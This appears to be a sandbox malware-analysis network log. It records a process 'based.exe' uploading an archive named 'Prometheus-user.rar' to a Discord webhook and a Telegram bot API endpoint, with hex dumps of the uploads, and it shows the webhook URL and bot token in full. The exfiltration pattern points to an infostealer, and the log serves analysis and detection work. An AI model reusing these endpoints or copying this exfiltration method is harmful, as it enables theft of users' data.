                                                                                                                                                          X-Timer: S1715269660.273154,VS0,VE133
                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                          X-Fastly-Request-ID: 992bcb0bbcf8ed4f27e6f43b1391027b0ed66a34
                                                                                                                                                          Expires: Thu, 09 May 2024 15:52:40 GMT
                                                                                                                                                          Source-Age: 0
                                                                                                                                                          2024-05-09 15:47:40 UTC38INData Raw: 32 2e 39 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
                                                                                                                                                          Data Ascii: 2.9|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.549742162.159.138.2324434292C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-05-09 15:48:15 UTC302OUTPOST /api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P HTTP/1.1
                                                                                                                                                          Host: discord.com
                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                          Content-Length: 689192
                                                                                                                                                          User-Agent: python-urllib3/2.2.1
                                                                                                                                                          Content-Type: multipart/form-data; boundary=47ab1338cc3a5d235f5896f1843d1118
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 2d 2d 34 37 61 62 31 33 33 38 63 63 33 61 35 64 32 33 35 66 35 38 39 36 66 31 38 34 33 64 31 31 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 db d5 38 19 21 04 00 00 01 0f ff ea 43 f3 17 14 86 ba 43 c9 80 8b b9 f9 8d a0 ff ec 48 1c 00 fd d0 52 82 7a b3 f7 ac be 3f e4 38 73 47 2f 2c 1b 0b dd 06 16 24 8d e9 13 30 18 fe 99 2d 51 3b 9d 91 24 21 5d 15 98 c7 55 1c 63 80 96 57 b3 7e 7c 29 63 2c 13 d3 06 e0 98 f7 69
                                                                                                                                                          Data Ascii: --47ab1338cc3a5d235f5896f1843d1118Content-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!8!CCHRz?8sG/,$0-Q;$!]UcW~|)c,i
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 5b 0b b8 87 9d f2 e1 9b 55 b1 c7 7a 3b 91 97 4d 63 b3 a6 9f b9 13 96 61 2d b0 46 18 58 16 f2 6e 18 1e cd f6 f0 e4 78 dc 50 ee 42 ad a1 09 9c 64 e0 ab a7 34 fe e4 bb 86 a1 eb 48 dc 99 de 22 d3 ec 47 c1 21 12 af 9c b9 2d bd 19 26 ee fb 63 ec 67 80 06 6c cb ea 3f 3f ed e8 36 47 1d d7 8d 20 03 32 ed 7d f6 88 2f 9b 69 3f 93 3a cf c9 34 90 5d 34 2d a0 89 48 3e 4e 9c eb f0 45 7c 52 42 6d 11 a5 d1 5d c7 6d 5b f8 af b6 fc 1a 75 e0 be 2b d5 b8 bc 38 b3 e4 29 dd 5a 88 33 e3 63 ce 96 5c 53 3f 6a 8b e6 98 70 1a c7 43 6c eb 82 af af d2 15 30 73 76 4c 5d d8 cd e5 41 3c 12 5b 89 c8 93 3a 61 c2 a1 93 9e 3a c0 ce 7f 36 32 45 81 15 99 66 a2 9c 25 ec 71 05 94 ca 69 ee 95 44 d4 e4 f3 8b 5f d5 fc bd fa 75 41 9d 1b 7d 06 db f2 34 6a e2 9f 5a 8e 8e f6 77 3e 02 a9 32 6b 9a 67 c5
                                                                                                                                                          Data Ascii: [Uz;Mca-FXnxPBd4H"G!-&cgl??6G 2}/i?:4]4-H>NE|RBm]m[u+8)Z3c\S?jpCl0svL]A<[:a:62Ef%qiD_uA}4jZw>2kg
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: d6 b9 78 00 85 7a da ca 46 4b 15 c1 b7 b7 08 ee b7 7d 8d 5e 36 19 c5 3a 5a 96 6c 03 cd d8 ed 95 70 8d 14 33 ae 5b 77 5d 08 06 e1 db 12 df a6 4b 63 27 8e 21 fd 9b 79 3d 15 91 bb ea 15 fd 85 80 61 83 f8 57 02 3b 91 10 de 2b a5 e4 50 f4 6a e3 4e e1 ef 57 03 61 9f 9f c7 92 ad dd d8 aa b0 3c 1c e5 6d c0 ff 29 da 99 c3 6d bd 68 97 f1 48 b7 8b 7b e7 2c 66 e2 20 d2 40 ec b8 2a 5b 62 b5 3f be ea 6e 54 62 89 40 ba d8 41 77 78 0c c6 18 af f0 98 ad ae c3 55 b2 3b 0b 80 b6 75 a7 15 b0 4a dd db ce a7 1a 4f 77 8e 29 1b 03 94 31 8d a2 a3 ad 62 be d5 79 f4 5d ee 1d b4 57 c0 2c 91 e9 7b a8 cf d4 10 7a 33 0d f5 e4 7a 34 73 b8 77 a8 bd 07 d4 41 e5 cd d4 42 67 e2 3b de a4 53 27 92 c3 e1 d2 5b c4 26 6a 64 d1 a7 cd 13 44 4f 69 14 a6 69 f4 6f 0d dc 4e da c6 5b 76 c4 22 5c 01 20
                                                                                                                                                          Data Ascii: xzFK}^6:Zlp3[w]Kc'!y=aW;+PjNWa<m)mhH{,f @*[b?nTb@AwxU;uJOw)1by]W,{z3z4swABg;S'[&jdDOiioN[v"\
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 59 9e 05 73 a1 69 1e 76 79 5f 8b 76 17 a1 eb 11 41 33 f3 bf 5b 67 08 01 40 ba 23 a3 a7 04 53 8f 62 32 33 13 c7 2f 93 56 89 5b ae 5a ab d8 91 ab 5d d3 4c 89 cc 76 d0 74 9a 51 49 f4 ec 8d 8b a4 b1 cc 90 4f 21 da da a8 56 72 97 a1 41 25 0f dd 9b e4 da f4 bf 57 56 b6 16 2b 86 68 81 f1 65 6d 18 2b 1f cb 19 42 bf a9 93 2c 30 d1 91 63 23 d7 2e 08 23 a0 ef 4c 96 85 de 4a 74 63 8d f5 8c 2a 0c d1 b0 e7 a6 1b 25 7f a0 9d 2f 3e 91 fc 1c b2 1b 55 4a fe d9 30 01 b8 2e a2 e0 a4 26 6f 9e 72 d5 88 89 7e c1 55 d0 0c 14 f0 09 a9 0b 44 40 8f 30 46 9c 5f ad fe 62 86 2f 1a f8 fb 24 09 c6 0c 1b 24 09 0b d1 3b 20 56 4a b2 2d 65 b5 6b 06 01 58 8c a5 1c 14 e1 19 37 2f 0b 2a 1c 0e b5 c8 b7 8c d5 8d 40 5a e7 8a 87 19 94 67 97 d4 60 0b 0a 87 10 2b 83 fc f9 36 0a 76 ce d7 92 0b 01 72
                                                                                                                                                          Data Ascii: Ysivy_vA3[g@#Sb23/V[Z]LvtQIO!VrA%WV+hem+B,0c#.#LJtc*%/>UJ0.&or~UD@0F_b/$$; VJ-ekX7/*@Zg`+6vr
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 79 49 3a d3 29 0f c6 42 ed 15 5a 1e d6 d5 6f ec 6d c5 de f0 e2 dd 03 29 56 01 cb 4f f0 28 75 9c 9e d4 22 5a 2f 2f 28 55 77 20 0e f2 45 fc 4f ac 9d 5a 4c a9 5c 2e 50 b6 bc 78 fa db 2b f0 8f ea 1f 8c 4c d0 7b 28 d1 95 4d aa 87 30 06 d4 33 83 f6 08 0a ba 06 9e 85 f6 cc 15 fe 34 d6 df 3b 7e 8d fd c8 66 bb f5 d0 68 e9 b5 ea 67 8f 0e 35 63 0e 23 92 34 e3 7b 7b 08 f1 7d 93 7a 6d 60 b4 f1 0e 08 01 4c 1c 15 40 7c 1f d9 0e af c8 54 1c a3 30 21 86 5d 94 c5 88 98 99 7a 29 b2 a3 95 01 4c 64 1b 83 66 3c 21 f5 1c ce db 30 06 57 e8 65 82 09 7f fa c1 5a 14 8b 1f ae ef 32 54 9d a9 4b 0d 16 87 74 dd 5d 0a 00 9c 19 4f b6 d1 21 48 df f2 2e 42 ae fb 76 c8 23 bc 83 7d 83 d1 2b 70 19 36 1f d6 ce c5 8d 0f af 2e 6f d4 b8 03 a9 40 53 46 86 0d 59 06 5b 63 e7 42 33 cf f8 94 ea fa 04
                                                                                                                                                          Data Ascii: yI:)BZom)VO(u"Z//(Uw EOZL\.Px+L{(M034;~fhg5c#4{{}zm`L@|T0!]z)Ldf<!0WeZ2TKt]O!H.Bv#}+p6.o@SFY[cB3
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 27 91 24 66 31 af 9a 95 fd cf 92 08 c7 4b b2 53 79 f9 b5 49 e1 29 ca 97 fb 4e 89 be ab 3d fe 9e 17 3a 70 37 16 ca 00 d6 d8 2a b9 1b 51 99 98 61 e7 ba 98 bd 02 4a df 94 d8 ef b5 b9 e5 de a9 5a 4c 5e b3 11 94 10 49 12 bd 9a 41 ff b7 28 90 63 7b 56 5a 9d 85 70 91 ce 49 e9 78 34 26 35 02 8d 03 f2 71 67 8b 51 62 b8 47 90 0b a4 c2 e3 9c b1 29 29 07 7e 7b f4 99 13 92 7a 02 f5 96 bb e9 11 3a bc dd 7e d2 e2 83 c0 f2 a3 5c ba c8 9c 9e 14 16 a5 2c 6d 22 23 54 b9 5c 7d 2e d2 f0 ea cc e4 dd e7 6a 40 4b 66 ae 8b 35 f3 df 16 fa c0 aa 58 d6 4d 61 8c bc be 49 8d c7 48 13 3b e2 2e f3 fb fa 7d 5b 9d db d7 9e b2 a5 ff 96 d0 b2 55 10 ae a9 c9 a1 da a3 a6 2d 8d 39 64 fc 09 58 7c f5 b0 13 91 72 cf df ca f2 13 e3 dc f0 cc 26 b8 c7 df 37 53 c9 7b b7 13 a7 7f 4b 0f 3b 30 b7 2d ec
                                                                                                                                                          Data Ascii: '$f1KSyI)N=:p7*QaJZL^IA(c{VZpIx4&5qgQbG))~{z:~\,m"#T\}.j@Kf5XMaIH;.}[U-9dX|r&7S{K;0-
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: b6 fd 01 28 ec ed 9f b1 ea a7 c9 7f 3f 4c 5f 32 01 ea 4c 6d 00 db 52 f9 a0 1d d3 27 26 76 8f c8 22 e3 48 79 f9 cb 5a aa ce 65 37 55 94 f6 b3 4d b7 42 f1 bf 1b 60 0c da d2 fc ef 01 37 11 d4 56 0d d1 5e 41 98 42 fd 61 ab c7 e8 80 70 c3 5f 80 e0 6d 37 40 42 d7 ea 9c 73 ae 78 be a2 3e 2b 43 af 82 87 05 4c ff ab ac a6 29 20 d1 e9 f3 76 ea 6e cc f8 54 8f e1 df a3 07 eb b5 25 5a d8 b1 fa b9 7b 77 09 7b cb 4a 7f 41 51 85 08 28 bb 9f 30 4e 17 ce a5 4b 35 a5 e3 43 1c 32 fe 64 55 e7 fd fc 15 4f bf 17 87 7d 8b a6 6b 21 43 29 5c 69 7a 5d c8 0f a1 8d 21 a7 02 dd d7 8f 4d e4 ac dd 3c 7e 0b 8c d1 9c b9 ee 6d 1e f8 bc 51 1a de 8e 3c f0 b1 d8 b6 f1 87 ed b5 98 40 7d 84 af 88 d0 f7 61 08 51 29 bd 56 df ae bb 74 69 f2 58 8e 51 f2 ba 5c 6c 7a 7f d3 26 5c 1d 21 22 34 a7 76 29
                                                                                                                                                          Data Ascii: (?L_2LmR'&v"HyZe7UMB`7V^ABap_m7@Bsx>+CL) vnT%Z{w{JAQ(0NK5C2dUO}k!C)\iz]!M<~mQ<@}aQ)VtiXQ\lz&\!"4v)
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 93 63 7f 3c 39 e4 be ec 2d b5 a5 82 1a 4c cd 98 41 f5 96 67 61 92 20 c7 aa 0b 34 42 d2 ec 82 54 d2 74 ba 1c 52 ff 34 60 a1 a3 e1 15 95 00 89 8e fe 86 c8 73 de ca 8b 6f 80 1c 14 d8 b1 18 36 d3 06 d7 f6 0c 19 cd 6b 0d 62 5d c2 ac 3d 46 62 bf ce 36 16 c0 d8 44 c5 8d 74 9b fe df 8c 15 b3 b8 2a 83 9a 10 8a 66 91 40 02 68 ec 78 32 c8 b8 2e 79 2b bf 52 e6 1c 2a bf 4f 05 24 45 75 80 80 f6 db 71 ce 2a 09 17 eb a8 9d 36 bb fe 10 c9 24 57 4f 6e cd 20 a2 52 0a 8b 7c 2d 5f 5f e1 02 82 c5 95 10 6b b5 23 63 45 09 fa 4c 0b 83 2a db 5d 49 1c 82 4b 36 cb d3 1d c0 ba cf 4a 89 ee 66 f0 61 a2 f4 7b 7e 92 db 5f 64 e1 b9 f0 9d ed 27 9b 21 35 6b f3 ac 5c 6e 96 74 0c 00 72 e9 65 42 1d 27 37 d9 45 ef 17 1f 7a 3e 93 95 6f 4f 7a 81 c6 38 a4 8a 82 10 9e d5 4c 98 5b b3 1c 82 dd cd f8
                                                                                                                                                          Data Ascii: c<9-LAga 4BTtR4`so6kb]=Fb6Dt*f@hx2.y+R*O$Euq*6$WOn R|-__k#cEL*]IK6Jfa{~_d'!5k\ntreB'7Ez>oOz8L[
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 67 b9 f7 07 c8 f6 4a 80 04 90 dd 3c b0 a8 27 79 06 4a 70 2f ce 2e d8 f1 8a d8 14 e1 4c 86 c8 5b 85 1a f9 88 d7 23 d1 54 7f 2f 13 9d ef 63 ec f8 89 57 b2 20 25 59 4a de 30 d3 77 de 5f 2f 89 84 69 6c 10 45 aa 75 9c 77 51 38 e2 cf 33 37 04 7a f9 9c cb c0 c4 c7 58 01 a7 77 37 ae 6e da 2e db a9 07 66 cb 04 05 74 dd 27 42 bc ff e6 14 5a d8 bf 1c c1 34 ad e1 37 ac bb 60 ae 27 3f fe de 12 85 13 ff c5 0a 28 d6 d2 e7 5f 3c de 75 55 e8 f4 4c 31 38 e1 1e ea c3 58 68 62 bf cc ba b0 29 b8 a8 46 eb 94 69 27 67 38 b7 b5 42 81 cf ae 1e 31 90 83 bc 54 ca 0d 2f a4 a6 50 37 e8 ac 0f fc ab 01 9f 67 8b d9 31 20 d8 34 76 3b fe de e1 e6 ce 53 96 30 1f d1 3e ce 3c 5b fd d9 48 cf c1 fc 49 fc eb 78 a6 c2 ae e2 da da 1d 40 a1 bb 0d e4 81 27 64 7f af 28 fa 1d 3d 71 9f a6 9c 97 7a 93
                                                                                                                                                          Data Ascii: gJ<'yJp/.L[#T/cW %YJ0w_/ilEuwQ837zXw7n.ft'BZ47`'?(_<uUL18Xhb)Fi'g8B1T/P7g1 4v;S0><[HIx@'d(=qz
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: bb 6a f1 4e 6b 3f db af 2d c2 6b 4b 25 db 92 8d cd e1 5d 93 cc e7 3d 22 65 c0 ad c7 7f 20 43 f4 c9 dd 86 67 32 fe c0 bd e8 0d ad a5 32 98 c1 91 d9 a6 a2 c2 d6 33 95 3f 69 6a 3a bc bd de 62 f7 71 b1 a7 87 f9 e2 3b 04 b7 cc 82 a8 2e c9 42 ea 27 50 05 87 dd 09 53 86 4e 92 0c 2c de be 70 42 db cf 23 6b 6d fc 5e a4 d6 e9 96 be 52 9d 58 41 c7 4b 1e 45 1b 75 50 82 b0 0f 41 d1 40 21 c4 f0 9e a9 f4 25 c4 81 05 b2 b5 1e 95 81 3a 2c 33 e9 88 df 11 1e 62 37 9e 60 fe 84 91 48 e7 de cc ff 14 c1 fc 66 c0 b1 91 60 2f de f1 a7 62 c7 06 67 bd d0 15 70 7d 47 fc 93 af 9b 70 ae aa f3 4b 89 87 33 78 02 6e 80 69 2d 0c 23 ef c3 5a ec 70 a2 42 1b 73 d3 96 4b be 18 db a5 0b 94 f3 1e df b4 45 18 7a f0 87 e2 c3 06 2c 58 e7 ef 38 fe 4c 62 e3 e0 22 16 3d 90 17 45 e3 c6 8a ff 40 83 cf
                                                                                                                                                          Data Ascii: jNk?-kK%]="e Cg223?ij:bq;.B'PSN,pB#km^RXAKEuPA@!%:,3b7`Hf`/bgp}GpK3xni-#ZpBsKEz,X8Lb"=E@
                                                                                                                                                          2024-05-09 15:48:16 UTC1255INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 09 May 2024 15:48:16 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          set-cookie: __dcfduid=8d0f189a0e1b11ef9935f6142af43071; Expires=Tue, 08-May-2029 15:48:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                          x-ratelimit-reset: 1715269697
                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YC7IYdyuAal7TCWHR2wzBarLSOADOyohS0eaQhtCqmvuZjlOeoLrUGS%2FvPHyb7exQIN%2FyoB2jq%2F5E9pYSOmSHBVbQFDa%2FP0MpbQILrpNrgaMqnfXXJLill4vHjCj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                          Set-Cookie: __sdcfduid=8d0f189a0e1b11ef9935f6142af43071a3364573a435c28db6652eed36070cc203e899fbc91a38ecf1e2d875e9fc3c7e; Expires=Tue, 08-May-2029 15:48:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.549746149.154.167.2204434292C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-05-09 15:48:17 UTC268OUTPOST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1
                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                          Content-Length: 689033
                                                                                                                                                          User-Agent: python-urllib3/2.2.1
                                                                                                                                                          Content-Type: multipart/form-data; boundary=5975628ebf9ab97afcc0f7733f8c581f
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 2d 2d 35 39 37 35 36 32 38 65 62 66 39 61 62 39 37 61 66 63 63 30 66 37 37 33 33 66 38 63 35 38 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 db d5 38 19 21 04 00 00 01 0f ff ea 43 f3 17 14 86 ba 43 c9 80 8b b9 f9 8d a0 ff ec 48 1c 00 fd d0 52 82 7a b3 f7 ac be 3f e4 38 73 47 2f 2c 1b 0b dd 06 16 24 8d e9 13 30 18 fe 99 2d 51 3b 9d 91 24 21 5d 15 98 c7 55 1c 63 80 96 57 b3 7e 7c 29 63 2c 13 d3 06
                                                                                                                                                          Data Ascii: --5975628ebf9ab97afcc0f7733f8c581fContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!8!CCHRz?8sG/,$0-Q;$!]UcW~|)c,
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 46 72 d3 2e 5b 0b b8 87 9d f2 e1 9b 55 b1 c7 7a 3b 91 97 4d 63 b3 a6 9f b9 13 96 61 2d b0 46 18 58 16 f2 6e 18 1e cd f6 f0 e4 78 dc 50 ee 42 ad a1 09 9c 64 e0 ab a7 34 fe e4 bb 86 a1 eb 48 dc 99 de 22 d3 ec 47 c1 21 12 af 9c b9 2d bd 19 26 ee fb 63 ec 67 80 06 6c cb ea 3f 3f ed e8 36 47 1d d7 8d 20 03 32 ed 7d f6 88 2f 9b 69 3f 93 3a cf c9 34 90 5d 34 2d a0 89 48 3e 4e 9c eb f0 45 7c 52 42 6d 11 a5 d1 5d c7 6d 5b f8 af b6 fc 1a 75 e0 be 2b d5 b8 bc 38 b3 e4 29 dd 5a 88 33 e3 63 ce 96 5c 53 3f 6a 8b e6 98 70 1a c7 43 6c eb 82 af af d2 15 30 73 76 4c 5d d8 cd e5 41 3c 12 5b 89 c8 93 3a 61 c2 a1 93 9e 3a c0 ce 7f 36 32 45 81 15 99 66 a2 9c 25 ec 71 05 94 ca 69 ee 95 44 d4 e4 f3 8b 5f d5 fc bd fa 75 41 9d 1b 7d 06 db f2 34 6a e2 9f 5a 8e 8e f6 77 3e 02 a9 32
                                                                                                                                                          Data Ascii: Fr.[Uz;Mca-FXnxPBd4H"G!-&cgl??6G 2}/i?:4]4-H>NE|RBm]m[u+8)Z3c\S?jpCl0svL]A<[:a:62Ef%qiD_uA}4jZw>2
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 77 45 3a d2 d6 b9 78 00 85 7a da ca 46 4b 15 c1 b7 b7 08 ee b7 7d 8d 5e 36 19 c5 3a 5a 96 6c 03 cd d8 ed 95 70 8d 14 33 ae 5b 77 5d 08 06 e1 db 12 df a6 4b 63 27 8e 21 fd 9b 79 3d 15 91 bb ea 15 fd 85 80 61 83 f8 57 02 3b 91 10 de 2b a5 e4 50 f4 6a e3 4e e1 ef 57 03 61 9f 9f c7 92 ad dd d8 aa b0 3c 1c e5 6d c0 ff 29 da 99 c3 6d bd 68 97 f1 48 b7 8b 7b e7 2c 66 e2 20 d2 40 ec b8 2a 5b 62 b5 3f be ea 6e 54 62 89 40 ba d8 41 77 78 0c c6 18 af f0 98 ad ae c3 55 b2 3b 0b 80 b6 75 a7 15 b0 4a dd db ce a7 1a 4f 77 8e 29 1b 03 94 31 8d a2 a3 ad 62 be d5 79 f4 5d ee 1d b4 57 c0 2c 91 e9 7b a8 cf d4 10 7a 33 0d f5 e4 7a 34 73 b8 77 a8 bd 07 d4 41 e5 cd d4 42 67 e2 3b de a4 53 27 92 c3 e1 d2 5b c4 26 6a 64 d1 a7 cd 13 44 4f 69 14 a6 69 f4 6f 0d dc 4e da c6 5b 76 c4
                                                                                                                                                          Data Ascii: wE:xzFK}^6:Zlp3[w]Kc'!y=aW;+PjNWa<m)mhH{,f @*[b?nTb@AwxU;uJOw)1by]W,{z3z4swABg;S'[&jdDOiioN[v
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 5a 18 05 70 59 9e 05 73 a1 69 1e 76 79 5f 8b 76 17 a1 eb 11 41 33 f3 bf 5b 67 08 01 40 ba 23 a3 a7 04 53 8f 62 32 33 13 c7 2f 93 56 89 5b ae 5a ab d8 91 ab 5d d3 4c 89 cc 76 d0 74 9a 51 49 f4 ec 8d 8b a4 b1 cc 90 4f 21 da da a8 56 72 97 a1 41 25 0f dd 9b e4 da f4 bf 57 56 b6 16 2b 86 68 81 f1 65 6d 18 2b 1f cb 19 42 bf a9 93 2c 30 d1 91 63 23 d7 2e 08 23 a0 ef 4c 96 85 de 4a 74 63 8d f5 8c 2a 0c d1 b0 e7 a6 1b 25 7f a0 9d 2f 3e 91 fc 1c b2 1b 55 4a fe d9 30 01 b8 2e a2 e0 a4 26 6f 9e 72 d5 88 89 7e c1 55 d0 0c 14 f0 09 a9 0b 44 40 8f 30 46 9c 5f ad fe 62 86 2f 1a f8 fb 24 09 c6 0c 1b 24 09 0b d1 3b 20 56 4a b2 2d 65 b5 6b 06 01 58 8c a5 1c 14 e1 19 37 2f 0b 2a 1c 0e b5 c8 b7 8c d5 8d 40 5a e7 8a 87 19 94 67 97 d4 60 0b 0a 87 10 2b 83 fc f9 36 0a 76 ce d7
                                                                                                                                                          Data Ascii: ZpYsivy_vA3[g@#Sb23/V[Z]LvtQIO!VrA%WV+hem+B,0c#.#LJtc*%/>UJ0.&or~UD@0F_b/$$; VJ-ekX7/*@Zg`+6v
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 98 04 75 a0 79 49 3a d3 29 0f c6 42 ed 15 5a 1e d6 d5 6f ec 6d c5 de f0 e2 dd 03 29 56 01 cb 4f f0 28 75 9c 9e d4 22 5a 2f 2f 28 55 77 20 0e f2 45 fc 4f ac 9d 5a 4c a9 5c 2e 50 b6 bc 78 fa db 2b f0 8f ea 1f 8c 4c d0 7b 28 d1 95 4d aa 87 30 06 d4 33 83 f6 08 0a ba 06 9e 85 f6 cc 15 fe 34 d6 df 3b 7e 8d fd c8 66 bb f5 d0 68 e9 b5 ea 67 8f 0e 35 63 0e 23 92 34 e3 7b 7b 08 f1 7d 93 7a 6d 60 b4 f1 0e 08 01 4c 1c 15 40 7c 1f d9 0e af c8 54 1c a3 30 21 86 5d 94 c5 88 98 99 7a 29 b2 a3 95 01 4c 64 1b 83 66 3c 21 f5 1c ce db 30 06 57 e8 65 82 09 7f fa c1 5a 14 8b 1f ae ef 32 54 9d a9 4b 0d 16 87 74 dd 5d 0a 00 9c 19 4f b6 d1 21 48 df f2 2e 42 ae fb 76 c8 23 bc 83 7d 83 d1 2b 70 19 36 1f d6 ce c5 8d 0f af 2e 6f d4 b8 03 a9 40 53 46 86 0d 59 06 5b 63 e7 42 33 cf f8
                                                                                                                                                          Data Ascii: uyI:)BZom)VO(u"Z//(Uw EOZL\.Px+L{(M034;~fhg5c#4{{}zm`L@|T0!]z)Ldf<!0WeZ2TKt]O!H.Bv#}+p6.o@SFY[cB3
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 84 c4 03 9a 27 91 24 66 31 af 9a 95 fd cf 92 08 c7 4b b2 53 79 f9 b5 49 e1 29 ca 97 fb 4e 89 be ab 3d fe 9e 17 3a 70 37 16 ca 00 d6 d8 2a b9 1b 51 99 98 61 e7 ba 98 bd 02 4a df 94 d8 ef b5 b9 e5 de a9 5a 4c 5e b3 11 94 10 49 12 bd 9a 41 ff b7 28 90 63 7b 56 5a 9d 85 70 91 ce 49 e9 78 34 26 35 02 8d 03 f2 71 67 8b 51 62 b8 47 90 0b a4 c2 e3 9c b1 29 29 07 7e 7b f4 99 13 92 7a 02 f5 96 bb e9 11 3a bc dd 7e d2 e2 83 c0 f2 a3 5c ba c8 9c 9e 14 16 a5 2c 6d 22 23 54 b9 5c 7d 2e d2 f0 ea cc e4 dd e7 6a 40 4b 66 ae 8b 35 f3 df 16 fa c0 aa 58 d6 4d 61 8c bc be 49 8d c7 48 13 3b e2 2e f3 fb fa 7d 5b 9d db d7 9e b2 a5 ff 96 d0 b2 55 10 ae a9 c9 a1 da a3 a6 2d 8d 39 64 fc 09 58 7c f5 b0 13 91 72 cf df ca f2 13 e3 dc f0 cc 26 b8 c7 df 37 53 c9 7b b7 13 a7 7f 4b 0f 3b
                                                                                                                                                          Data Ascii: '$f1KSyI)N=:p7*QaJZL^IA(c{VZpIx4&5qgQbG))~{z:~\,m"#T\}.j@Kf5XMaIH;.}[U-9dX|r&7S{K;
